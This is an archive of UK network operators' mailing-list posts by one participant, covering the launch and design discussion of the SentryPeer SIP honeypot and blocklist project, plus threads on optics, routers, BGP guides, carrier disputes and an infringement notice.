[uknof] SentryPeerHQ
Hi all, I've just released https://sentrypeer.com which some of you might find useful: About SentryPeerHQ -> https://sentrypeer.com/about Fully Open Source -> https://github.com/SentryPeer/SentryPeerHQ Always free -> https://sentrypeer.com/pricing (for those that contribute data by running an official SentryPeer node or their own honeypot) Thanks, Gavin.
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
Hi all, Come a long way since Nov: https://github.com/SentryPeer/SentryPeer/releases/tag/v1.4.0 Peer to peer bad_actor replication is now released. Deutsche Telekom "T-Pot - The All In One Honeypot Platform" included SentryPeer (https://github.com/telekom-security/tpotce/tree/22.x) and Kali Linux is coming - https://bugs.kali.org/view.php?id=7523#c15939 Would love to have some testers onboard! Thanks, Gavin.
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
> > https://github.com/SentryPeer/SentryPeer > > I haven't delved into the p2p protocol side of things, but as a long > time C programmer I'd be extremely wary of starting a large new project > with it. Especially one that is designed to be exposed to attackers. An > opportunity to learn Go or Rust perhaps? Hi Jonathan, I had quite bad analysis paralysis for exactly that reason. I know Go and have just recorded a show for SE Radio ( https://www.se-radio.net/team/gavin-henry/) with Tim about Rust (Tim's book - https://www.manning.com/books/rust-in-action ). I thought about both, and looked at the state of the SIP libraries, Peer to Peer libs and BGP ones. Rust seems to be suffering with Mozilla re-work and now: "The entire moderation team resigns, effective immediately. This resignation is done in protest of the Core Team placing themselves unaccountable to anyone but themselves." - 4 days ago https://github.com/rust-lang/team/pull/671 The libp2p looked great too for Go and Rust - https://libp2p.io/ but there's one company behind it https://protocol.ai/ and I really enjoyed this https://zguide.zeromq.org/docs/chapter8/ I'd also looked at Elixir, but various things I wanted to achieve kept pulling me back to C. I enjoyed recording this with Jens too https://www.se-radio.net/2020/06/episode-414-jens-gustedt-on-modern-c/ and am speaking to Robert Seacord on Secure Coding in C ( https://en.wikipedia.org/wiki/Robert_C._Seacord) next month and Daniel who created curl after that. curl is 25 years old. Go isn't. Rust is 5 or so. I'm sure everyone here has been burnt by framework X going away. C won't. My goal is longevity and pretty much what I say in the README.md - https://github.com/SentryPeer/SentryPeer/blob/main/README.md "I started this because I wanted to do C network programming as all the projects I use daily are in C like PostgreSQL, OpenLDAP, FreeSWITCH, OpenSIPS, Asterisk etc. See Episode 414: Jens Gustedt on Modern C for why C is a good choice." and so far, it's been the right choice for examples I'm following, books I have and places this project can run and be built. And honestly, I like the level of control and minutiae. But, the prototype of SentryPeer was done in a few days...(https://github.com/SentryPeer/SentryPeer/tree/main/prototype). Once I had made the decision, it felt right and I cracked on. Lastly, I think you can still write unsafe code in C, but with the IDE you use, CI/CD (https://github.com/SentryPeer/SentryPeer/actions) and all the scanning tools, you should catch most things. It's easy to write unsafe Rust or Go too - https://www.computer.org/csdl/proceedings-article/icse/2020/712100a234/1pK5e6OTqJa We talk about this in the upcoming Rust show. Not all of SentryPeer has to be in C. I think there's a place for C, Go and Rust in this or whatever, but I wanted to use C and that's the option you get when you start something. Choices, warts and all :-) Remember, most of the problem spaces discussed in this email thread have nothing to do with Cyet Thanks, Gavin.
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
> > Maybe we can submit our HP data to your API > > I think having a way to side load data would be amazing once a > spec/schema has been done. Ideas? The SQL schema is basic :-) https://github.com/SentryPeer/SentryPeer/blob/main/src/database.c#L11
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
> Hello Hi Leo! > We built the same! Awesome. Code to share? > Maybe we can submit our HP data to your API I think having a way to side load data would be amazing once a spec/schema has been done. Ideas? > good stuff Thanks for reading :-) > Leo
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
> This looks like a neat project and it is great that you've open sourced it. I > can see how it would be useful for folks that want an open source solution to > deploy their own honeypots and feed that back into private blocklists. Thanks Rob. > On a wider, shared blocklist level, this seems like a relatively simple > problem to solve, but the parallels with email spam are hard to avoid. I know. Especially the p2p part. > There have been a few similar blocklists including the ITSPA/Comms Council > Cargill & Cox DNS based project whose name temporarily escapes my braincells, > and the apiban project (Fred Posner - Kamailio, LOD) which seems to be > gaining some traction. snitch, but that is a passive pcap tool. I wanted batteries included. yep, I like APIBAN, but all the data sits there. It is free and centralised. Clients are open source. No phone numbers. > I guess the feature of your project is the open federation protocol, but I > think there are reasons that most approaches to this kind of filtering are > behind a curtain controlled by gatekeeper and Matthew covered most of them. > There is a very high trust bar for most providers to import filtering > decisions into their network, and I can't think of any non-curated approach > that has ever flown. > There are much smarter people than me that will have solved this I'm sure. I think it's the "rules based" approach, vs ML approach etc. I just want to get the data in folks hands and I think the filtering part will solve itself. > It will be interesting to see how this pans out though, certainly looks like > a great learning and data collection project. That's why I've started it. I've already learned a ton! Packaging it for one!
Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
>> Working on the API and web UI next, then the p2p part of it. Feel free >> to submit any feature requests or have a play :-) > Hi Matthew, Thank you very much for your reply and time spent thinking about all of the below. Much appreciated! > P2P sounds ripe for abuse by bad actors... A few scenarios: That's correct. I think the authz/authn issues have already been solved in other places. I'm thinking about things like signing up on StackOverflow or Reddit and what you can do the first time without any reputation etc. Similar to email. I was chatting to Justin Richer (https://www.se-radio.net/2019/08/episode-376-justin-richer-on-api-security-with-oauth-2/) about this last month: "I took a look at the peer project and it sounds interesting. A lot like BitTorrent’s protocol, but with the sharing at a higher level, it seems? So it might be worthwhile researching into how graph networks like that determine trustworthiness of nodes. Most of them have a kind of distributed consensus state that gets reached after some time, and so there’s no client authentication needed within the network itself because the clients will be identified by some ephemeral key and trusted based on actions instead of a pre-registration. Still, there are a few different efforts that are dealing with bridging registration type questions in the OAuth and related spaces. OAuth 2 assumes clients all have client IDs and they’re pre-registered. The Dynamic Registration spec (RFC7591) allows that registration to happen programmatically as a discrete pre-step, but it also allows the client to present a signed assertion (the software statement) that helps the client claim that it is legitimate. An extension to OpenID Connect recently introduced the idea of the client sending a “registration” object with the initial request to the AS, to provide a drive-by registration in a single step. The client would get a client ID out the other end if it’s successful. I haven’t seen this applied in practice anywhere yet. The OpenID SIOP group has been discussing overloading the Client ID parameter itself to contain semantic information allowing the client to send an identifier that the AS could use to fetch client registration information. This subverts the idea of the client ID as understood by most implementations (it’s now client-supplied and meaningful instead of AS-supplied and opaque to the client). The frontrunner here is using DIDs and DID documents to convey stuff, but that’s mostly because that’s the tech this crowd currently likes a lot. In GNAP we’ve inverted the registration requirement a bit — the protocol’s set up to assume that you’re coming in with no previous registration, so you can send any client information necessary during the initial request, and that initial request always happens the same way regardless of how the interactions and other next steps go. But there’s an optimization for cases when you :do: have a pre-registered client, so that you can send the ID instead of the client info itself. I’m not sure how much of that actually applies to what you’re working on, based on my very limited understanding of what you’re doing, but I hope it’s helpful. Good luck with the project!" > 1. You only get the list if you provide a list of your own. Therefore, > someone adds some random IPs into a list, then knows what the state of the > network is, and as soon as the IP they're using appears on the list, they > stop using it until it drops back off. True. The IP address harvesting is one thing, but stage two when they actively try to make phone calls will always happen as it's too lucrative not to. That's the data I'm also interested in getting and sharing. Folks that run the nodes will be able to add their own phone number allocations and I'm thinking about using the various RIR feeds etc. RPKI. Again, I think this is a solved problem, I just need to find the right place to look. > 2. IPv6 means presumably blocking /64s at a time rather than individual > addresses, I don't know if privacy addressing etc is a thing in the telephony > market, where addresses rotate after a while? Not sure yet. > 3. CGNAT means you might affect more than you intended, and the problem will > only get worse over time. How is this currently handled with an infected PC behind CGNAT? That's a solved problem? > 4. If the source IP is just a compromised device, you've booted that person > (who may be an entire office) off SIP for a week or more, even if they fix > the issue. You don't need to block them, but depending on what the ITSP wants to do, they could get limited service etc. > Additionally, from a feature POV: > > 1. BGP sounds like a needless over-complication. Surely just some iptables > (realistically: nftables) hooks would do? Both. Depends on how you run your nodes. The BGP part I just like the thought of and want to explore. > 2. A user is never going to pay for all data collected if it's available via > P2P, and if it
[uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot
Hi all, I hope you don't mind the post, but thought this might be of use and in the spirit of release early, release often I've done an alpha release: https://github.com/SentryPeer/SentryPeer There's a presentation too if you'd like to watch/read where I hope to go with this: https://blog.tadsummit.com/2021/11/17/sentrypeer/ Working on the API and web UI next, then the p2p part of it. Feel free to submit any feature requests or have a play :-) Thanks for reading and any feedback is welcome! -- Kind Regards, Gavin Henry. -- Kind Regards, Gavin Henry.
Re: [uknof] ADVA optic
Thanks all. Adva got back to me and sent one direct via Sol Distribution. £48 inc vat and del. On Wed, 9 Dec 2020 at 22:28, David Croft wrote: > Adva don't sell direct, try Infradata https://www.infradata.co.uk/ > > David > > On Sun, 29 Nov 2020 at 14:54, Gavin Henry wrote: > > > > Hi all, > > > > Long story short, an optic in a OR supplied GE102Pro (H) > > (fsp-150-ge-100-pro) has been swapped and doesn't work (we didn't find > > out for ages that it's an LX one). We've taken one from a unit not yet > > live in the same rack, but need to get a replacement. OR will charge a > > site visit etc. (so I'm told), so I just want to get a replacement. As > > seen in the picture attached it's a: > > > > adva sfp/gbe/850i/mm/lc 0061003006 > > > > I was looking at this, but Flexoptix can't key the same type and > > suggest a generic one: > > > > > https://www.flexoptix.net/en/sfp-sx-transceiver-1-gigabit-mm-850nm-550m-7db-ddm-dom.html?co3066=18152 > > > > and ProLabs haven't got back to me on this price: > > > > > https://www.prolabs.com/products/transceivers/adva/sfp/1000base/0061003006-c > > > > fs.com say this will work, but it's to go direct to the customer so I > > want to be 100% certain: > > > > https://www.fs.com/uk/products/75332.html > > > > Do ADVA sell them directly as they haven't got back to me? There's a > > ton on eBay, but I wanted to get a new one. Any recommendations? I > > need one by Friday 4th Dec. > > > > Many thanks, > > Gavin. > -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 330 44 50 000 D +44 (0) 330 44 55 007 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp:// pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] ADVA optic
Hi all, Long story short, an optic in a OR supplied GE102Pro (H) (fsp-150-ge-100-pro) has been swapped and doesn't work (we didn't find out for ages that it's an LX one). We've taken one from a unit not yet live in the same rack, but need to get a replacement. OR will charge a site visit etc. (so I'm told), so I just want to get a replacement. As seen in the picture attached it's a: adva sfp/gbe/850i/mm/lc 0061003006 I was looking at this, but Flexoptix can't key the same type and suggest a generic one: https://www.flexoptix.net/en/sfp-sx-transceiver-1-gigabit-mm-850nm-550m-7db-ddm-dom.html?co3066=18152 and ProLabs haven't got back to me on this price: https://www.prolabs.com/products/transceivers/adva/sfp/1000base/0061003006-c fs.com say this will work, but it's to go direct to the customer so I want to be 100% certain: https://www.fs.com/uk/products/75332.html Do ADVA sell them directly as they haven't got back to me? There's a ton on eBay, but I wanted to get a new one. Any recommendations? I need one by Friday 4th Dec. Many thanks, Gavin.
Re: [uknof] ADVA optic
Apologies, resent without image attachment in case it got blocked. Thanks.
Re: [uknof] 4G routers that can be centrally managed
> > Thanks. Mostly Mikrotik recommendations at the moment. Will take a look at those too. >
Re: [uknof] 4G routers that can be centrally managed
Thanks for the MikroTik recommendations.
[uknof] 4G routers that can be centrally managed
Hi all, I'm looking for recommendations of low cost routers with a bit of management. I'm not sure if these should be ubnt or meraki style with 4G exit points or all SIM enabled, or regular routers with a dongle. It's part of an Aberdeen City Digital Inclusion programme (hence extremely lost cost where broadband just isn't affordable) but could be part of the Scottish Government lead ‘No One Left Behind in a Digital Scotland’ programme too. Thanks, Gavin. -- Kind Regards, Gavin Henry. https://www.surevoip.co.uk
Re: [uknof] COVID-19 offers of help and network changes
Sounds good to me.
Re: [uknof] COVID-19 offers of help and network changes
> Reminds me (in a another life) of giving transit to a few folks who lost out > during 9/11 for free - Fantastic that you guys are offering this free! Well > done! We're a community here, as you know. I haven't been able to get to a UKNOF or LINX/LONAP face to face for a long time now as my son Ben (a bit about me and Ben - https://www.bbc.co.uk/programmes/p06rqp6c ) is disabled and it's near impossible to do overnights. This email was the only thing I could think of to show my support to everyone - sharing knowledge. Gavin.
Re: [uknof] COVID-19 offers of help and network changes
> Bravo, Gavin, Thanks! > I’m just about to write to my customers offering the same thing. > > As a return, we do firewalls, networks (Enterprise or SP) and IPT. I'm putting out an email tomorrow to customers, partners and resellers as the amount of emails today from folks that don't realise they can just unplug their desk phone and plug it in at home. Of course, there will be those that just sell them new ones of softphones, but still. A bit of friendly free education will go along way. Gavin.
[uknof] COVID-19 offers of help and network changes
Hi all, We're a small company of 7. 4 of us are now working from home, others to decide, but the option is there. I know everyone is probably extremely VoIP savvy, but if any one needs any help or advice about setups at home etc. feel free to reply here of off-list. If there's anything else I can help with, albeit being a small network operator, just let me know. Has anyone seen any big demands yet? I've been following NANOG and the Italian graphs. Thanks, Gavin. -- Kind Regards, Gavin Henry. Managing Director. SureVoIP - https://surevoip.co.uk
Re: [uknof] why aren't we giving /31 to customers
No idea. Our leased line/ethernet customers get a /31. CPE are Juniper SRXs, some Mikrotik using that /32 hack or just DrayTek. No problems. Then we charge extra for more IPv4. IPv6 comes with it.
Re: [uknof] Ubnt and iOS 12 help
Hi all, Forgot to follow up on this for others. You were all right!!! Needed: set security flow tcp-mss all-tcp miss 1350 to reduce TCP MISS from what we had for most setups which was 1438. https://blog.apnic.net/2014/12/15/ip-mtu-and-tcp-mss-missmatch-an-evil-for-network-performance/ Cheers.
Re: [uknof] Getting rid of old kit
> > If you don't need BGP and can live with static routes, it's a good box. > > Mark. > The mx204? >
Re: [uknof] Getting rid of old kit
On Wed, 6 Nov 2019 at 14:40, James Bensley wrote: > > On Wed, 6 Nov 2019 at 14:10, Gavin Henry wrote: > > I think there > > are folks that buy old Juniper kit for resale? > > Yes, Juniper ;) Although, that is usually as part of a new purchase, > they don't just buy old Juniper kit for nothing. > > Seriously though, following Job's suggestion of a hackerspace, if you > want to donate them you could reach out to NetNI/NetMcr/NetLnd and see > if they have any young network engineers that could use them for a > home lab / cert training. I'll add that to my options list. Thanks all for the suggestion.
Re: [uknof] Getting rid of old kit
Hi Job, Thanks. Yeah, I agree. I'd like someone to use them since they cost a bomb in 2013. We're just using them mainly for VoIP traffic and a handful of ethernet and FTTC supporting circuits, but we've just won a chunk of new business which will pay for our upgrade. Gavin.
Re: [uknof] Ubnt and iOS 12 help
I'll also add that we watch it pick up via DHCP and hit our website and DNS servers, but then started to timeout on the redirect. So it's getting out OK like the rest of non-iOS devices. MTU does seem to fit.
Re: [uknof] Ubnt and iOS 12 help
> On Tue, 17 Sep 2019, 16:29 Dan Kitchen, wrote: >> >> Sounds like an MTU issue to me. > > > +1 > Possibly coupled with high packet loss > > I've had a few people come to me recently with Wi-Fi problems on devices, and > they're on 2.4GHz Wi-Fi and using Bluetooth. Turning off Bluetooth or > switching to 5GHz Wi-Fi improves things drastically. My guess is that newer > chips share the 2.4G radio rx/tx and don't do a very good job. > Hi all, So we tried bluetooth off. No luck. Bought a new 5GHz - https://www.ui.com/unifi/unifi-ap-ac-lite/ with cloud key and it didn't work. They took that home and tested on a Sky router and it worked with the same iPhone (awaiting make/model and settings). Seems to be our network then. Where this works on my own set up, it is BTW FTTC. This set up is via our TTB FTTC links, same MTU though of 1492 for all FTTC links. I'm going tomorrow with an iPhone 8 with the new iOS 13.1 on it to test that has never seen this network. There is a pair of SRX220H2s there and at home is a SRX100H2, same settings and controller versions and disc firmwares. No URL filtering or anything like a Juniper KB points to: https://kb.juniper.net/InfoCenter/index?page=content=KB29239 Any other ideas? Will report back. Thanks, Gavin.
Re: [uknof] BT/EE and Vodafone - why the split?
> > > > > "kicked [them] off their network" in what context of network? > > https://aastatus.net/27798 - this will relate to the EU SIP2SIM cards > which use Vodafone NL. > We don't use that service, but that's the only public link I could find. I think that's a Manx service. But yeah... >
Re: [uknof] BT/EE and Vodafone - why the split?
You can see more here: https://aastatus.net/27798 " We're sorry for the short notice, but we've been given short notice. The reason for this is due to an ongoing commercial dispute between Vodaphone Group and EE UK."
Re: [uknof] BT/EE and Vodafone - why the split?
Hi Neil/Tom, In regards to roaming agreements. Vodafone isn't allowed to roam on to the EE network anymore since a week ago today at 5pm. I'm trying to learn more. Thanks. On Fri, 8 Feb 2019 at 06:36, Neil J. McRae wrote: > EE is just a brand so not sure what you mean - kicked them off? > > Regards, > Neil. > > Sent from my iPhone > > On 7 Feb 2019, at 22:31, Gavin Henry wrote: > > Hi all, > > Does anyone have an insight as to why EE kicked Vodafone off their network > last Friday at 5pm? > > Thanks, > > -- > Kind Regards, > Gavin Henry. > https://surevoip.co.uk > > -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 330 44 50 000 D +44 (0) 330 44 55 007 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp:// pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] BT/EE and Vodafone - why the split?
Hi all, Does anyone have an insight as to why EE kicked Vodafone off their network last Friday at 5pm? Thanks, -- Kind Regards, Gavin Henry. https://surevoip.co.uk
Re: [uknof] Internet Instability between 11:01 - 11:13 GMT?
> Dear Giles, > > On Tue, Feb 05, 2019 at 12:12:58PM +, Giles Coochey wrote: > > We saw a blip with our peering with AS61231 (SSE), anyone else > > experience any BGP strangeness around 11:01 - 11:13 GMT today? > > I've heard quite some people report that their EBGP sessions with Level3 > / AS 3356 flapped around that time. You may have seen second order > effects from such instability? > > I don't have more details. We saw our Level3 BGP sessions go down in Telehouse East.
Re: [uknof] OpenReach CP Customer Establishement
Good luck Leigh. We’re a long-standing Wholesale Partner who also wanted to use Openreach services, so tried the establishment process. Openreach wouldn’t even return our calls. It’s over two years now (yes, really) of chasing and emails ignored, phone calls not returned, so zero progress. Same here. We took years for WLR3 and almost the same for our SS7 interconnects, but to be honest most delays were our side not following the massive documentation process. Only advice would be to get your account managers name address and (home phone number) and do everything in a timely fashion. I did have to complain a lot though about slowness to move things forward at the start. Gavin.
Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
On 20 March 2017 at 10:28, Stuart Hendersonwrote: >> Original message >> From: Jack Kay >> >> Maplins appear to sell patch leads but no optics.. helpful. > > On 2017/03/20 09:13, Peter Knapp wrote: >> You cant really expect them to sell sfps though given branded >> manufacturers are all device coded (including Advas) > > Maybe flexoptix could do a deal with them :) > Yeah, that's what we use on our Junipers too. Why not have the copper SFP as a default, or have the ethernet live (need to check the ADVA model, it's probably only 100mb/s) and leave it to the customer to swap it if they need a longer run? Normally the rj45 sfp cost more though, so that will be why no doubt. Thanks.
Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
Evening, Well, the layer 2 provider into us is SSE and the tail is Openreach. For a "small fee" SSE are arriving tomorrow with an SFP and patch lead. Sorted. Thanks all!
Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
On 18 Mar 2017 17:46, "Neil J. McRae" <n...@domino.org> wrote: Is it a 1G circuit ? Yeah, all cleared up (see my earlier reply). Sent from my iPhone > On 18 Mar 2017, at 17:23, Gavin Henry <ghe...@suretec.co.uk> wrote: > > Hi all, > > OR didn't deliver RJ45 presentation like requested and our customer is > trying to get this up at the weekend > > Anyone based round Arlington Business Park, Stevenage with some? > > Thanks. > > -- > Kind Regards, > Gavin Henry. >
Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
Hi Simon, Yeah, it is. I've double checked our provisioning ticket and carrier order. It's all clear that it's an SM fibre end at the NTE and the customer was informed and accepted. Sorry for the OR comment, the carrier got my hopes up saying ethernet was requested but not delivered and they raised a fault. So, customer needs an sfp and patch lead by Monday...hmmm..why do they do this at weekends and not tell you so you can advise. Thanks. On 18 Mar 2017 17:41, "Simon Lockhart" <si...@slimey.org> wrote: On Sat Mar 18, 2017 at 05:14:40PM +0000, Gavin Henry wrote: > OR didn't deliver RJ45 presentation like requested and our customer is > trying to get this up at the weekend If it's GigE presentation on an EAD, then fibre is the only choice. You can choose between multimode and singlemode, though :) Simon
[uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP
Hi all, OR didn't deliver RJ45 presentation like requested and our customer is trying to get this up at the weekend Anyone based round Arlington Business Park, Stevenage with some? Thanks. -- Kind Regards, Gavin Henry.
[uknof] Looking Glass
Morning all, Does anyone have any recommendations for a decent open source software looking glass project they have used? Thanks. -- Kind Regards, Gavin Henry.
Re: [uknof] Jon Boyer or Jon Blank - ipv4hosting.com
On 19 Sep 2016 22:13, "Hal ponton"wrote: > > They've emailed everyone of our addresses so far today abuse / webmaster / lir you name it. > -- And their unsubscribe is a non-mailinglist email. Yeah, sure. Thanks.
[uknof] Jon Boyer or Jon Blank - ipv4hosting.com
Evening all, If anyone knows either of these, tell them to go away! Anybody else had 3 emails from them today? -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Multi-tenant PBX Solution
> However, it's worth noting that if you're going to be using Asterisk and selling the product to your customers who will in turn rely solely on your product for telephony, you need to make sure you're very aware and up to speed on the legal aspects. > I would replace the word Asterisk with the words "software based product" in the above paragraph. > From what I've seen implemented, read up on and inevitably replaced, it's incredibly difficult to build a solution using Asterisk that would be able to survive the test of general condition 4.[2] > ^^^ This applies to any software stack solution. It is your own due diligence to test and adopt any solution. Whether it's Asterisk or not. It is fair to say that there have a lot of bad Asterisk solutions out there, but it's not supposed to be used for everything. It's usually provided as the A in a LAMP stack but there's so much more needed if selling a landline replacement service, as Richard points out. > Forget the shiny web UI, the billing interfaces, systems operations, etc; if you can't maintain an call and lose half your network, you're setting yourself up for a number of very big (and potentially expensive) headaches. > Again, not specific to Asterisk or its known weaknesses - http://mcfunley.com/choose-boring-technology I'm the opposite. Asterisk has its place and should only be bashed when you've experienced it. I think Richard has experienced it though :) Gavin. -- Kind Regards, Gavin Henry. Managing Director. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider
Re: [uknof] Multi-tenant PBX Solution
Hi Paul, Have a look at the voiceops mailing list. There was a big thread this year about this. Usually one every year. Depends on your requirements re proprietary software and/or open source stacks. Interesting reading though, with lots of options. Thanks.
[uknof] SeaMeWe-3 owners
Hi, If you are from any of the following companies, can you contact me offlist for a quote regarding a customer we have that is coming in to us on this cable: Orange BT Eircom Sri Lanka Telecom Tata Communications Verizon Sprint Vodafone Deutsche Telecom Thanks muchly! -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] WLR3 BTOR TPI companies
Evening all, I presume some of you will be using one of these: Choosing a Third Party Integrator (TPI) : The following is a list of operationally active TPIs who have an approved and working WLR3 interface solution with Openreach. They have brought customers through the WLR3 product establishment process: * Aurora Kendrick James - www.aurorakendrickjames.com ; www.akjl.co.uk * General Dynamics (previously known as Vangent Ltd) - www.gdit.com * Kofax Limited (previously known as Singularity) - www.kofax.com * Strategic Imperatives - www.imperatives.co.uk * Union Street Technology - www.unionstreet.uk.com ] Any to avoid? I also remember my email about doing an OSS integration last year. Thanks. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 330 44 50 000 D +44 (0) 330 44 55 007 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] StackStorm
Anyone using or playing with this? https://stackstorm.com/ Going to take a look, but we have all the bits underneath already. Will see how crippled they're base version is. Usual "it's open source" model maybe. Thanks. -- Kind Regards, Gavin Henry.
[uknof] Junos license changes
Evening all, I suppose old news, but then I can't find anything online about the change from a quick Google. Had a meeting with our Juniper account manager today and have learned the new SRX range, at least, now come with only firewall features and other "basic" things for the same price as the old range. You now have to pay a licence fee for things like MPLS and Junos is no longer licensed to the hardware. The coming of whitebox networking to the rest of the Juniper range and not just the vXX and OCX range ( http://www.juniper.net/uk/en/products-services/switching/ocx1100/)?? I'm sure they'll make tons from the "Certified for Junos" model like Red Hat etc. Gavin. -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider
Re: [uknof] Copper ethernet for OoB in Telehouse East
Hi all, All sorted now. Thanks. -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] Copper ethernet for OoB in Telehouse East
Hi all, Can anyone offer me something? Nothing fancy. We're in TFM61 M07. Happy to reciprocate. Thanks. -- Kind Regards, Gavin Henry. Winner of the Best Business ITSP (Medium Enterprise) 2016! http://www.surevoip.co.uk/2016-best-provider OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] FTTC Wires only
> Haven’t tried it yet, but the Draytek Vigor 130 should do the same job - > transparent Ethernet/VDSL bridge. They might be a bit more expensive, but as > a UK company, they may be sympathetic to the plight - and also keen to plug > the gap in the market and clean-up in the process. > We use these for our customers (business customers) with great success. I run one at home too via a Juniper SRX100 on FTTC full 80/20. Works nice with our VoIP. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] BGP configuration best practices from ANSSI and others
> Please don't use that guide as the basis for any BGP speaking router in the > 21st Century :) Patches welcome. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] BGP configuration best practices from ANSSI and others
Hi all, This is really very good (in case anyone missed it): http://www.ssi.gouv.fr/uploads/2013/10/BGP_configuration_best_practices.pdf for (as per listed in PDF): SR-OS (Alcatel-Lucent) IOS (Cisco) Junos (Juniper) OpenBGPD (OpenBSD) Covers: Interconnection 1: bilateral peering in an Internet exchange point Interconnection 2: peering using a route server in an exchange point Interconnection 3: private peering between two ASes in a Network Access Point, or interconnection in a telecommunications room Interconnection 4: session established in multihop with relationships: Relationship 1: transit / stub customer Relationship 2: transit AS / small transit AS Relationship 3: peering I'm sure it's old new, but very handy to save. Thanks. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://pool.subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] More Telecity woes?
Hi all, What's the latest? Thanks. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Notice of Claimed Infringement
> > Machine readable, even. Here is a pseudonymised example: > > > < Yep, this is the exact one.
Re: [uknof] Notice of Claimed Infringement
> After a little more analysis we became sure it was mostly due to one > source. We quickly tracked the offender down to someone in network ops > who was running a torrent client without setting bandwidth limits! A > quiet word was had. Complaints about network speed stopped. > Nice one!
Re: [uknof] Notice of Claimed Infringement
> Get in touch with your customer, ask them to stop it, and get back to > Paramount and inform them of the same. Thanks. That's the least we'll do. Their business connection could have been compromised and they're unaware. We'll see.
Re: [uknof] Notice of Claimed Infringement
